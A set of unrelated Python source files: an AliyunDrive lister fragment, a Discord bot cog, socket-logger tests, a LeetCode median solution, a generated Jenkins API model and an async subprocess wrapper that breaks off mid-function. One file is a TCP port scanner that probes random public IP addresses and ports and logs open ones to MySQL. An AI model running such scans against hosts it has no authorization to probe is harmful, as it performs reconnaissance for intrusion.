self.list[u] = tuple(tmp)
self.lock.release()
print(f"[AliyunDrive] {u} list updated at " + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
self.inCheck = False
self.listOutdated = time.time() + self.conf["sys_dataExpiredTime"]
return True
def __pro_load_list(self, user, arr, nowID="root", strURI="", rootIndex=0):
isStart = True
data = self.api[user].get_list(nowID)
# 进入根目录
for file in data:
if len(self.rootPath) != 0 and rootIndex <= len(self.rootPath) - 1:
isStart = False
if file["type"] == "folder" and file["name"] == self.rootPath[rootIndex]:
self.__pro_load_list(
user, arr, file["file_id"], strURI + "/" + file["name"], rootIndex + 1
)
continue
if not isStart:
return
status = []
for file in data:
# 过滤排除的文件夹/文件
if self.STATIC.util.isNeedLoad(file["type"] == "folder", str(file["name"]), self.conf):
continue
# 项
item = {
"isFolder": file["type"] == "folder",
"createTime": 0,
"lastOpTime": self.STATIC.util.format_time(file["updated_at"]),
"parentId": file["parent_file_id"],
"fileId": file["file_id"],
"filePath": strURI + "/" + file["name"],
"fileName": str(file["name"]),
"fileSize": self.STATIC.util.format_size(file["size"]) if file["type"] != "folder" else -1,
"fileType": None,
"child": [],
"user": user,
"isSecret": False,
"driveName": "aliyundrive"
}
if not item["isFolder"]:
item["fileType"] = str(item["fileName"]).split(".")[-1]
else:
status.append(self.COMMON.thread.plz().submit(self.__pro_load_list, *(
user, item["child"], item["fileId"], strURI + "/" + file["name"], rootIndex)))
arr.append(item)
# 阻塞多线程获取文件夹内容
for x in as_completed(status):
pass
def info(self, user, fid, dl=False):
try:
return self.api[user].get_download_url(fid)
except Exception as e:
self.STATIC.localMsger.error(e)
self.STATIC.localMsger.green(f"[AliyunDrive] {user} try to login")
try:
self.api[user].do_refresh_token()
return self.api[user].get_download_url(fid)
except Exception as ee:
self.STATIC.localMsger.error(ee)
return False
|
# Copyright (c) 2019-2022 ThatRedKite and contributors
import discord
import aioredis
from discord.ext import commands, tasks
from discord.ext.commands.errors import CommandInvokeError
from thatkitebot.backend.util import errormsg
from thatkitebot.backend import cache
class ListenerCog(commands.Cog):
"""
The perfect place to put random listeners in.
"""
def __init__(self, bot):
self.dirname = bot.dirname
self.redis_cache: aioredis.Redis = bot.redis_cache
self.redis_welcomes: aioredis.Redis = bot.redis_welcomes
self.repost_redis: aioredis.Redis = bot.redis_repost
self.bot: discord.Client = bot
@commands.Cog.listener()
async def on_command_error(self, ctx: commands.Context, error: CommandInvokeError):
match type(error):
case commands.CommandOnCooldown:
await errormsg(ctx, f"Sorry, but this command is on cooldown! Please wait {int(error.retry_after)} seconds.")
case commands.CommandInvokeError:
if self.bot.debugmode:
await errormsg(ctx, repr(error))
raise error
case commands.CheckFailure:
await errormsg(ctx, "A check has failed! This command might be disabled on the server or you lack permission")
case commands.MissingPermissions:
await errormsg(ctx, "Sorry, but you don't have the permissions to do this")
case commands.NotOwner:
await errormsg(ctx, "Only the bot owner can do this! Contact them if needed.")
@tasks.loop(hours=1.0)
async def reset_invoke_counter(self):
self.bot.command_invokes_hour = 0
@commands.Cog.listener()
async def on_ready(self):
print("\nbot successfully started!")
self.reset_invoke_counter.start()
await self.bot.change_presence(
activity=discord.Activity(name="a battle against russia", type=5),
status=discord.Status.online,
)
@commands.Cog.listener()
async def on_command_completion(self, ctx):
self.bot.command_invokes_hour += 1
self.bot.command_invokes_total += 1
@commands.Cog.listener()
async def on_slash_command_error(self, ctx, ex):
raise ex
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
try:
await cache.add_message_to_cache(self.redis_cache, message)
except:
print("could not add message to cache!")
"""
@commands.Cog.listener()
async def on_raw_message_delete(self, payload: discord.RawMessageDeleteEvent):
try:
key = f"{hex(payload.guild_id)}:{hex(payload.channel_id)}:{hex(payload.cached_message.author.id)}:{hex(payload.message_id)}"
if await self.redis_cache.exists(key):
await self.redis_cache.delete(key)
# delete the associated repost if it exists
if len(rkeys := [rkey async for rkey in self.repost_redis.scan_iter(match=f"{payload.message_id}:*")]) > 0:
await self.repost_redis.delete(rkeys[0])
except:
pass
@commands.Cog.listener()
async def on_raw_message_edit(self, payload):
try:
key = f"{hex(payload.guild_id)}:{hex(payload.channel_id)}:{hex(payload.cached_message.author.id)}:{hex(payload.message_id)}"
if await self.redis_cache.exists(key):
await cache.add_message_to_cache(self.redis_cache, payload.cached_message)
except:
print("could not edit cached message")
"""
def setup(bot):
bot.add_cog(ListenerCog(bot))
|
<gh_stars>0
import socket
import time
import getopt
import sys
import mysql.connector
import signal
import os
from sys import argv
from prettytable import PrettyTable
from random import randint, choice
from string import hexdigits
ip = "localhost"
port = 80
timeout = 1
retry = 1
_range = 10
delay = 0
verbose = False
single_address = True
single_port = True
up = 0
down = 0
db = False
portscan = False
mydb = mysql.connector.connect(
host="localhost",
user="root",
passwd="<PASSWORD>",
database="ipscanner"
)
mycursor = mydb.cursor()
full_cmd_arguments = argv
argument_list = full_cmd_arguments[1:]
arguments = len(argv) - 1
short_options = "hp:vt:r:abi:ds"
long_options = ["help", "port=", "verbose",
"timeout=", "range=", "r-address", "r-port", "ip-address=", "database", "portscan"]
def handler(signum, frame):
print("\nKeyboardInterrupt")
os._exit(0)
signal.signal(signal.SIGINT, handler)
def random_ip():
octets = []
for x in range(4):
octets.append(str(randint(0, 255)))
return '.'.join(octets)
def isOpen(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
try:
s.connect((ip, int(port)))
s.shutdown(socket.SHUT_RDWR)
return True
except:
return False
finally:
s.close()
def checkHost(ip, port):
ipup = False
for i in range(retry):
if isOpen(ip, port):
ipup = True
break
else:
time.sleep(delay)
return ipup
def main(ip, port):
signal.signal(signal.SIGINT, handler)
up = 0
down = 0
print("------------------------------")
print("Starting...")
print("------------------------------")
if portscan:
for i in range(65536):
if(i == 100):
raise KeyboardInterrupt('hello')
if checkHost(ip, i):
print(ip + ":" + str(i) + " is OPEN")
up += 1
if db:
InsertToDB(ip, i)
else:
if verbose:
print(ip + ":" + str(i) + " is CLOSED")
down += 1
else:
if single_address:
if single_port:
if checkHost(ip, port):
print(ip + ":" + str(port) + " is UP")
if db:
InsertToDB(ip, port)
else:
print(ip + ":" + str(port) + " is DOWN")
else:
for i in range(_range):
port = randint(0, 65535)
if checkHost(ip, port):
print(ip + ":" + str(port) + " is UP")
up += 1
if db:
InsertToDB(ip, port)
else:
if verbose:
print(ip + ":" + str(port) + " is DOWN")
down += 1
else:
if single_port:
for i in range(_range):
ip = random_ip()
if checkHost(ip, port):
print(ip + ":" + str(port) + " is UP")
up += 1
if db:
InsertToDB(ip, port)
else:
if verbose:
print(ip + ":" + str(port) + " is DOWN")
down += 1
else:
for i in range(_range):
ip = random_ip()
port = randint(0, 65535)
if checkHost(ip, port):
print(ip + ":" + str(port) + " is UP")
up += 1
if db:
InsertToDB(ip, port)
else:
if verbose:
print(ip + ":" + str(port) + " is DOWN")
down += 1
print("------------------------------")
if portscan:
print(f"{up} ports were OPEN")
print(f"{down} ports were CLOSED")
else:
print(f"{up} IPs were UP")
print(f"{down} IPs were DOWN")
def InsertToDB(_ip, _port):
sql = "INSERT INTO results (IP, Port) VALUES (%s, %s)"
val = (_ip, str(_port))
mycursor.execute(sql, val)
mydb.commit()
if __name__ == '__main__':
address = "localhost"
port = 80
try:
arguments, values = getopt.getopt(
argument_list, short_options, long_options)
except getopt.error as err:
# Output error, and return with an error code
print(str(err))
sys.exit(2)
for current_argument, current_value in arguments:
if current_argument in ("-h", "--help"):
print("Displaying help")
x = PrettyTable()
x.field_names = ["Argument", "Alternative",
"Parameter type", "Info", "Default"]
x.add_row(["--help", "-h", "None", "Displays help", "None"])
x.add_row(["--verbose", "-v", "None", "Enables verbose mode", "False"])
x.add_row(["--port", "-p", "Integer", "Sets port to scan", "80"])
x.add_row(["--timeout", "-t", "Float", "Sets scan timeout (seconds)", "1"])
x.add_row(["--range", "-r", "Integer",
"Sets the amount of times to scan", "10"])
x.add_row(["--r-address", "-a", "None",
"Enables random address mode", "False"])
x.add_row(["--r-port", "-b", "None",
"Enables random port mode", "False"])
x.add_row(["--ip-address", "-i", "Str",
"Sets IP address to scan", "localhost"])
x.add_row(["--database", "-d", "None",
"Saves online addresses to a MySQL database", "None"])
x.add_row(["--portscan", "-s", "None",
"Enables portscan mode", "False"])
print(x)
sys.exit()
elif current_argument in ("-v", "--verbose"):
print("Enabling verbose mode")
verbose = True
elif current_argument in ("-p", "--port"):
print(("Port set as %s") % (current_value))
port = int(current_value)
elif current_argument in ("-t", "--timeout"):
print(("Timeout set as %s") % (current_value))
timeout = float(current_value)
elif current_argument in ("-r", "--range"):
print(("Range set as %s") % (current_value))
_range = int(current_value)
elif current_argument in ("-a", "--r-address"):
print("Enabling random address mode")
single_address = False
elif current_argument in ("-b", "--r-port"):
print("Enabling random port mode")
single_port = False
elif current_argument in ("-i", "--ip-address"):
print(("IP address set as %s") % (current_value))
address = current_value
elif current_argument in ("-d", "--database"):
print("Enabling database mode")
db = True
elif current_argument in ("-s", "--portscan"):
print("Enabling portscan mode")
portscan = True
try:
main(address, port)
except:
print(sys.exc_info())
os._exit(0)
|
<gh_stars>100-1000
import unittest
import errno
import logging
import socket
from testfixtures import log_capture
import slimta.logging.socket
from slimta.logging import getSocketLogger
class FakeSocket(object):
def __init__(self, fd, peer=None):
self.fd = fd
self.peer = peer
def fileno(self):
return self.fd
def getpeername(self):
return self.peer
class FakeContext(object):
def session_stats(self):
return {'hits': 13}
class TestSocketLogger(unittest.TestCase):
def setUp(self):
self.log = getSocketLogger('test')
@log_capture()
def test_send(self, l):
sock = FakeSocket(136)
self.log.send(sock, 'test send')
l.check(('test', 'DEBUG', 'fd:136:send data=\'test send\''))
@log_capture()
def test_recv(self, l):
sock = FakeSocket(29193)
self.log.recv(sock, 'test recv')
l.check(('test', 'DEBUG', 'fd:29193:recv data=\'test recv\''))
@log_capture()
def test_accept(self, l):
server = FakeSocket(926)
client = FakeSocket(927, 'testpeer')
self.log.accept(server, client)
self.log.accept(server, client, 'testpeer2')
l.check(('test', 'DEBUG', 'fd:926:accept clientfd=927 peer=\'testpeer\''),
('test', 'DEBUG', 'fd:926:accept clientfd=927 peer=\'testpeer2\''))
@log_capture()
def test_connect(self, l):
sock = FakeSocket(539, 'testpeer')
self.log.connect(sock)
self.log.connect(sock, 'testpeer2')
l.check(('test', 'DEBUG', 'fd:539:connect peer=\'testpeer\''),
('test', 'DEBUG', 'fd:539:connect peer=\'testpeer2\''))
@log_capture()
def test_encrypt(self, l):
sock = FakeSocket(445)
context = FakeContext()
self.log.encrypt(sock, context)
l.check(('test', 'DEBUG', 'fd:445:encrypt hits=13'))
@log_capture()
def test_shutdown(self, l):
sock = FakeSocket(823)
self.log.shutdown(sock, socket.SHUT_RD)
self.log.shutdown(sock, socket.SHUT_WR)
self.log.shutdown(sock, socket.SHUT_RDWR)
l.check(('test', 'DEBUG', 'fd:823:shutdown how=\'read\''),
('test', 'DEBUG', 'fd:823:shutdown how=\'write\''),
('test', 'DEBUG', 'fd:823:shutdown how=\'both\''))
@log_capture()
def test_close(self, l):
sock = FakeSocket(771)
self.log.close(sock)
l.check(('test', 'DEBUG', 'fd:771:close'))
@log_capture()
def test_error(self, l):
sock = FakeSocket(680)
exc = OSError(errno.EPIPE, 'Broken pipe')
self.log.error(sock, exc, 'testaddress')
slimta.logging.socket.socket_error_log_level = logging.WARNING
self.log.error(sock, exc)
l.check(('test', 'ERROR', 'fd:680:error address=\'testaddress\' args=(32, \'Broken pipe\') message=\'[Errno 32] Broken pipe\''),
('test', 'WARNING', 'fd:680:error args=(32, \'Broken pipe\') message=\'[Errno 32] Broken pipe\''))
# vim:et:fdm=marker:sts=4:sw=4:ts=4
|
<filename>python/BinarySearch/4_median_of_two_sorted_arrays.py
# !/usr/bin/env python
# coding: utf-8
'''
Description:
There are two sorted arrays nums1 and nums2 of size m and n respectively.
Find the median of the two sorted arrays. The overall run time complexity should be O(log (m+n)).
Example 1:
nums1 = [1, 3]
nums2 = [2]
The median is 2.0
Example 2:
nums1 = [1, 2]
nums2 = [3, 4]
The median is (2 + 3)/2 = 2.5
Tags: Binary Search, Array, Divide and Conquer
分析:
(1)直观的解法:
直接merge两个数组,然后求第k大的元素。时间为O(m+n)。
不过仅需要第k大的元素,不需要整个排序;可以用一个计数器记录当前已经找到第m大的元素。
同时使用两个指针pA和pB,分别指向A和B数组的第一个元素;使用类似merge sort的原理,
如果数组A当前元素小,那么pA++同时m++,如果数组B当前元素小,那么pB++同时m++。
最终当m=k时,就得到了想要的答案。O(k)的时间, O(1)的空间。但当k很接近m+n时,这个方法还是O(m+n)的。
(2)O(log(m+n)) 的解法:
将这道题转化为更通用的形式是: 给定两个已经排序好的数组,找到两者所有元素中第k小的元素。
median = (m+n)//2 是第(median+1)小的数
假设数组A和B的元素个数都大于k/2,将A的第k/2个元素(即A[k/2 -1])和B的第k/2个元素(即B[k/2 -1])比较:
+ A[k/2 -1] < B[k/2 -1]: 意味着A[0]到A[k/2 -1]都在topk元素范围内
+ A[k/2 -1] > B[k/2 -1]: 意味着B[0]到B[k/2 -1]都在topk元素范围内
+ A[k/2 -1] == B[k/2 -1]: 找到第k大的元素,直接返回A[k/2 -1]或B[k/2 -1]
递归函数的终止条件:
+ 当A或B为空时,直接返回B[k-1]或A[k-1]
+ 当k=1时,返回min(A[0], B[0])
+ 当A[k/2 -1] == B[k/2 -1]时,返回A[k/2 -1]或B[k/2 -1]
'''
class Solution(object):
# O(m+n) runtime; O(1) space
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
"""
result, i, j = [], 0, 0
m, n = len(nums1), len(nums2)
while i < m and j < n:
if nums1[i] < nums2[j]:
result.append(nums1[i])
i += 1
elif nums1[i] > nums2[j]:
result.append(nums2[j])
j += 1
else:
result.extend([nums1[i], nums2[j]])
i += 1
j += 1
while i < m:
result.append(nums1[i])
i += 1
while j < n:
result.append(nums2[j])
j += 1
if (m+n) % 2 == 1:
return result[(m+n)//2]
else:
return (result[((m+n)//2)-1] + result[(m+n)//2]) / 2.0
# O(k) runtime; O(1) space
def findMedianSortedArrays2(self, nums1, nums2):
total = len(nums1) + len(nums2)
if total % 2 == 1:
return self.findK(nums1, nums2, total/2)
else:
return (self.findK(nums1, nums2, total/2 - 1) + self.findK(nums1, nums2, total/2)) / 2.0
def findK(self, nums1, nums2, k): # k: index
m, n = len(nums1), len(nums2)
i, j, index, kth = 0, 0, -1, 0
while index < k and i < m and j < n:
if nums1[i] <= nums2[j]:
kth = nums1[i]
i += 1
index += 1
else:
kth = nums2[j]
j += 1
index += 1
while index < k and i < m:
kth = nums1[i+k-index-1]
i += 1
index += 1
while index < k and j < n:
kth = nums2[j+k-index-1]
j += 1
index += 1
return kth
# O(log(m+n)) runtime; O(log(m+n)) space
def findMedianSortedArrays3(self, nums1, nums2):
total = len(nums1) + len(nums2)
if total % 2 == 1:
return self.find_kth(nums1, nums2, total/2 + 1)
else:
return (self.find_kth(nums1, nums2, total/2) + self.find_kth(nums1, nums2, total/2 + 1)) / 2.0
# find kth number, index k+1
def find_kth(self, nums1, nums2, k):
m, n = len(nums1), len(nums2)
# always assume that m is equal or smaller than n
if m > n:
return self.find_kth(nums2, nums1, k)
if m == 0:
return nums2[k-1]
if n == 0:
return nums1[k-1]
if k == 1:
return min(nums1[0], nums2[0])
# divide k into two parts
pa = min(m, k/2)
pb = k - pa
if nums1[pa-1] < nums2[pb-1]:
return self.find_kth(nums1[pa:], nums2, k - pa)
elif nums1[pa-1] > nums2[pb-1]:
return self.find_kth(nums1, nums2[pb:], k - pb)
else:
return nums1[pa-1]
if __name__ == '__main__':
print Solution().findMedianSortedArrays([1,3], [2]) # output: 2
print Solution().findMedianSortedArrays2([1,2], [3,4]) # output: 2.5
print Solution().findMedianSortedArrays3([1,3], [2]) # output: 2
print Solution().findMedianSortedArrays3([1,2], [3,4]) # output: 2.5
|
<gh_stars>0
# coding: utf-8
from datetime import date, datetime
from typing import List, Dict, Type
from openapi_server.models.base_model_ import Model
from openapi_server.models.all_view import AllView
from openapi_server.models.free_style_project import FreeStyleProject
from openapi_server.models.hudsonassigned_labels import HudsonassignedLabels
from openapi_server.models.unlabeled_load_statistics import UnlabeledLoadStatistics
from openapi_server import util
class Hudson(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, _class: str=None, assigned_labels: List[HudsonassignedLabels]=None, mode: str=None, node_description: str=None, node_name: str=None, num_executors: int=None, description: str=None, jobs: List[FreeStyleProject]=None, primary_view: AllView=None, quieting_down: bool=None, slave_agent_port: int=None, unlabeled_load: UnlabeledLoadStatistics=None, use_crumbs: bool=None, use_security: bool=None, views: List[AllView]=None):
"""Hudson - a model defined in OpenAPI
:param _class: The _class of this Hudson.
:param assigned_labels: The assigned_labels of this Hudson.
:param mode: The mode of this Hudson.
:param node_description: The node_description of this Hudson.
:param node_name: The node_name of this Hudson.
:param num_executors: The num_executors of this Hudson.
:param description: The description of this Hudson.
:param jobs: The jobs of this Hudson.
:param primary_view: The primary_view of this Hudson.
:param quieting_down: The quieting_down of this Hudson.
:param slave_agent_port: The slave_agent_port of this Hudson.
:param unlabeled_load: The unlabeled_load of this Hudson.
:param use_crumbs: The use_crumbs of this Hudson.
:param use_security: The use_security of this Hudson.
:param views: The views of this Hudson.
"""
self.openapi_types = {
'_class': str,
'assigned_labels': List[HudsonassignedLabels],
'mode': str,
'node_description': str,
'node_name': str,
'num_executors': int,
'description': str,
'jobs': List[FreeStyleProject],
'primary_view': AllView,
'quieting_down': bool,
'slave_agent_port': int,
'unlabeled_load': UnlabeledLoadStatistics,
'use_crumbs': bool,
'use_security': bool,
'views': List[AllView]
}
self.attribute_map = {
'_class': '_class',
'assigned_labels': 'assignedLabels',
'mode': 'mode',
'node_description': 'nodeDescription',
'node_name': 'nodeName',
'num_executors': 'numExecutors',
'description': 'description',
'jobs': 'jobs',
'primary_view': 'primaryView',
'quieting_down': 'quietingDown',
'slave_agent_port': 'slaveAgentPort',
'unlabeled_load': 'unlabeledLoad',
'use_crumbs': 'useCrumbs',
'use_security': 'useSecurity',
'views': 'views'
}
self.__class = _class
self._assigned_labels = assigned_labels
self._mode = mode
self._node_description = node_description
self._node_name = node_name
self._num_executors = num_executors
self._description = description
self._jobs = jobs
self._primary_view = primary_view
self._quieting_down = quieting_down
self._slave_agent_port = slave_agent_port
self._unlabeled_load = unlabeled_load
self._use_crumbs = use_crumbs
self._use_security = use_security
self._views = views
@classmethod
def from_dict(cls, dikt: dict) -> 'Hudson':
"""Returns the dict as a model
:param dikt: A dict.
:return: The Hudson of this Hudson.
"""
return util.deserialize_model(dikt, cls)
@property
def _class(self):
"""Gets the _class of this Hudson.
:return: The _class of this Hudson.
:rtype: str
"""
return self.__class
@_class.setter
def _class(self, _class):
"""Sets the _class of this Hudson.
:param _class: The _class of this Hudson.
:type _class: str
"""
self.__class = _class
@property
def assigned_labels(self):
"""Gets the assigned_labels of this Hudson.
:return: The assigned_labels of this Hudson.
:rtype: List[HudsonassignedLabels]
"""
return self._assigned_labels
@assigned_labels.setter
def assigned_labels(self, assigned_labels):
"""Sets the assigned_labels of this Hudson.
:param assigned_labels: The assigned_labels of this Hudson.
:type assigned_labels: List[HudsonassignedLabels]
"""
self._assigned_labels = assigned_labels
@property
def mode(self):
"""Gets the mode of this Hudson.
:return: The mode of this Hudson.
:rtype: str
"""
return self._mode
@mode.setter
def mode(self, mode):
"""Sets the mode of this Hudson.
:param mode: The mode of this Hudson.
:type mode: str
"""
self._mode = mode
@property
def node_description(self):
"""Gets the node_description of this Hudson.
:return: The node_description of this Hudson.
:rtype: str
"""
return self._node_description
@node_description.setter
def node_description(self, node_description):
"""Sets the node_description of this Hudson.
:param node_description: The node_description of this Hudson.
:type node_description: str
"""
self._node_description = node_description
@property
def node_name(self):
"""Gets the node_name of this Hudson.
:return: The node_name of this Hudson.
:rtype: str
"""
return self._node_name
@node_name.setter
def node_name(self, node_name):
"""Sets the node_name of this Hudson.
:param node_name: The node_name of this Hudson.
:type node_name: str
"""
self._node_name = node_name
@property
def num_executors(self):
"""Gets the num_executors of this Hudson.
:return: The num_executors of this Hudson.
:rtype: int
"""
return self._num_executors
@num_executors.setter
def num_executors(self, num_executors):
"""Sets the num_executors of this Hudson.
:param num_executors: The num_executors of this Hudson.
:type num_executors: int
"""
self._num_executors = num_executors
@property
def description(self):
"""Gets the description of this Hudson.
:return: The description of this Hudson.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this Hudson.
:param description: The description of this Hudson.
:type description: str
"""
self._description = description
@property
def jobs(self):
"""Gets the jobs of this Hudson.
:return: The jobs of this Hudson.
:rtype: List[FreeStyleProject]
"""
return self._jobs
@jobs.setter
def jobs(self, jobs):
"""Sets the jobs of this Hudson.
:param jobs: The jobs of this Hudson.
:type jobs: List[FreeStyleProject]
"""
self._jobs = jobs
@property
def primary_view(self):
"""Gets the primary_view of this Hudson.
:return: The primary_view of this Hudson.
:rtype: AllView
"""
return self._primary_view
@primary_view.setter
def primary_view(self, primary_view):
"""Sets the primary_view of this Hudson.
:param primary_view: The primary_view of this Hudson.
:type primary_view: AllView
"""
self._primary_view = primary_view
@property
def quieting_down(self):
"""Gets the quieting_down of this Hudson.
:return: The quieting_down of this Hudson.
:rtype: bool
"""
return self._quieting_down
@quieting_down.setter
def quieting_down(self, quieting_down):
"""Sets the quieting_down of this Hudson.
:param quieting_down: The quieting_down of this Hudson.
:type quieting_down: bool
"""
self._quieting_down = quieting_down
@property
def slave_agent_port(self):
"""Gets the slave_agent_port of this Hudson.
:return: The slave_agent_port of this Hudson.
:rtype: int
"""
return self._slave_agent_port
@slave_agent_port.setter
def slave_agent_port(self, slave_agent_port):
"""Sets the slave_agent_port of this Hudson.
:param slave_agent_port: The slave_agent_port of this Hudson.
:type slave_agent_port: int
"""
self._slave_agent_port = slave_agent_port
@property
def unlabeled_load(self):
"""Gets the unlabeled_load of this Hudson.
:return: The unlabeled_load of this Hudson.
:rtype: UnlabeledLoadStatistics
"""
return self._unlabeled_load
@unlabeled_load.setter
def unlabeled_load(self, unlabeled_load):
"""Sets the unlabeled_load of this Hudson.
:param unlabeled_load: The unlabeled_load of this Hudson.
:type unlabeled_load: UnlabeledLoadStatistics
"""
self._unlabeled_load = unlabeled_load
@property
def use_crumbs(self):
"""Gets the use_crumbs of this Hudson.
:return: The use_crumbs of this Hudson.
:rtype: bool
"""
return self._use_crumbs
@use_crumbs.setter
def use_crumbs(self, use_crumbs):
"""Sets the use_crumbs of this Hudson.
:param use_crumbs: The use_crumbs of this Hudson.
:type use_crumbs: bool
"""
self._use_crumbs = use_crumbs
@property
def use_security(self):
"""Gets the use_security of this Hudson.
:return: The use_security of this Hudson.
:rtype: bool
"""
return self._use_security
@use_security.setter
def use_security(self, use_security):
"""Sets the use_security of this Hudson.
:param use_security: The use_security of this Hudson.
:type use_security: bool
"""
self._use_security = use_security
@property
def views(self):
"""Gets the views of this Hudson.
:return: The views of this Hudson.
:rtype: List[AllView]
"""
return self._views
@views.setter
def views(self, views):
"""Sets the views of this Hudson.
:param views: The views of this Hudson.
:type views: List[AllView]
"""
self._views = views
|
# Cross-platform asynchronous version of subprocess.Popen
#
# Copyright (c) 2011-2012
# <NAME>
# anatoly techtonik
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
Provides an asynchronous wrapper around the subprocess module.
The solution is inspired by snippet <NAME> posted at StackOverflow
at the following URL: http://stackoverflow.com/questions/375427/
-------------
Limitations
-------------
[ ] Popen arguments stdin/stdout/stderr can only be PIPE or None
[x] calling process.stdin.close() causes exception
IOError: close() called during concurrent operation on the same file object.
'''
__version__ = '0.5dev'
from subprocess import PIPE, Popen
from threading import Thread, Lock
from warnings import warn
from collections import deque
# --- debugging helper ---
def echo(msg):
import sys
sys.stderr.write(msg)
sys.stderr.flush()
# --- functions that run in separate threads ---
def threadedOutputQueue(pipe, queue, lock):
'''
Called from the thread to update an output (stdout, stderr) queue.
'''
try:
while True:
chunk = pipe.readline()
if not chunk:
# hit end-of-file
break
lock.acquire()
queue.append(chunk)
lock.release()
except:
pass
finally:
pipe.close()
def threadedInputQueue(pipe, queue, lock):
'''
Called from the thread to update an input (stdin) queue.
'''
try:
while True:
lock.acquire()
while len(queue) > 0:
chunk = queue.popleft()
pipe.write(chunk)
pipe.flush()
lock.release()
except:
pass
finally:
pipe.close()
# --/ functions that run in separate threads ---
class StdinQueue(object):
'''
Spin off queue managenent thread for stdin and
wrap common stdin file methods to be thread safe.
[ ] find out which methods are not thread safe
'''
def __init__(self, stdin):
self.stdin = stdin
'''Queue of data to write to stdin.'''
self._queue = deque()
'''Lock used for stdin queue synchronization.'''
self._lock = Lock()
'''Queue management thread for stdin.'''
self._thread = Thread(target=threadedInputQueue,
args=(self.stdin, self._queue, self._lock))
self._thread.daemon = True
self._thread.start()
def write(self, data):
if data:
# enqueue data
self._lock.acquire()
self._queue.append(data)
self._lock.release()
def close(self):
# threads are stopped when their pipes are closed
self._lock.acquire()
self.stdin.close()
self._lock.release()
class AsyncPopen(Popen):
'''
Asynchronous wrapper around subprocess.Popen.
Do not directly access AsyncPopen.stdout, AsyncPopen.stderr, or
AsyncPopen.stdin. Instead, use the (non-blocking asynchronous)
AsyncPopen.asyncomm() method.
This reads entire lines from stdout and stderr at once.
Inspired by snippet of <NAME>, found at the following URL:
http://stackoverflow.com/questions/375427/
'''
def __init__(self, args, bufsize=0, executable=None,
stdin=None, stdout=None, stderr=None,
preexec_fn=None, close_fds=False, shell=False,
cwd=None, env=None, universal_newlines=False,
startupinfo=None, creationflags=0):
'''
Creates a new AsyncPopen instance.
All of the arguments are the same as for subprocess.Popen with several
exceptions:
* stdin, stdout, and stderr can only be None or PIPE.
In Python 3, all data read from stdout and stderr will be treated as
the "bytes" built-in type; it is up to the user to convert this type
to the appropriate character type, if desired.
'''
self._stdin = None
self._stdout = None
self._stderr = None
# Check for use of stdin, stdout, stderr values other than NONE, PIPE
if stdin not in (None, PIPE):
warn("stdin must be either None or subprocess.PIPE.")
else:
self._stdin = stdin
if stdout not in (None, PIPE):
warn("stdout must be either None or subprocess.PIPE.")
else:
self._stdout = stdout
if stderr not in (None, PIPE):
warn("stderr must be either None or subprocess.PIPE.")
else:
self._stderr = stderr
# Inherit base class behavior.
super(AsyncPopen, self).__init__(args, bufsize=bufsize,
executable=executable,
stdin=self._stdin,
stdout=self._stdout,
stderr=self._stderr,
preexec_fn=preexec_fn,
close_fds=close_fds,
shell=shell, cwd=cwd, env=env,
universal_newlines=universal_newlines,
startupinfo=startupinfo,
creationflags=creationflags)
# Start the I/O polling threads.
if self._stdout:
self.stdout_queue = deque()
'''Queue of data read from stdout.'''
self.stdout_lock = Lock()
'''Lock used for stdout queue synchronization.'''
self.stdout_thread = Thread(target=threadedOutputQueue,
args=(self.stdout, self.stdout_queue,
self.stdout_lock))
'''Queue management thread for stdout.'''
self.stdout_thread.daemon = True
self.stdout_thread.start()
if self._stderr:
self.stderr_queue = deque()
'''Queue of data read from stderr.'''
self.stderr_lock = Lock()
'''Lock used for stderr queue synchronization.'''
self.stderr_thread = Thread(target=threadedOutputQueue,
args=(self.stderr, self.stderr_queue,
self.stderr_lock))
'''Queue management thread for stderr.'''
self.stderr_thread.daemon = True
self.stderr_thread.start()
if self._stdin:
self.stdin = StdinQueue(self.stdin)
def communicate(self, input=None):
if self._stdin:
if input:
self.stdin.write(input)
# close stdin pipe for the children process. If
# it is blocked waiting for input, this will make
# it receive EOF to unblock.
self.stdin.close()
stdoutdata = b'' if self._stdout else None
stderrdata = b'' if self._stderr else None
while self.poll() == None:
# [ ] this causes 100% CPU load
(out, err) = self.asyncomm()
if out:
stdoutdata += out
if err:
stderrdata += err
# wait until threads terminate to empty queues
if self._stdout:
self.stdout_thread.join()
if self._stderr:
self.stderr_thread.join()
# read out everything
(out, err) = self.asyncomm()
if out:
stdoutdata += out
if err:
stderrdata += err
return (stdoutdata, stderrdata)
def asyncomm(self, input=None):
'''
Interact with process: Enqueue data to be sent to stdin. Return data
read from stdout and stderr as a tuple (stdoutdata, stderrdata). Do
NOT wait for process to terminate.
'''
if self._stdin and input:
self.stdin.write(input)
stdoutdata = None
stderrdata = None
if self._stdout:
# get data
data = b"" # ([ ] check b'' in pre-Python 2.7)
self.stdout_lock.acquire()
try:
while len(self.stdout_queue) > 0:
data += self.stdout_queue.popleft()
except:
self.stdout_lock.release()
raise
self.stdout_lock.release()
# [ ] detect closed pipe to return None
stdoutdata = data
if self._stderr:
# get data
data = b"" # ([ ] check b'' in pre-Python 2.7)
self.stderr_lock.acquire()
try:
while len(self.stderr_queue) > 0:
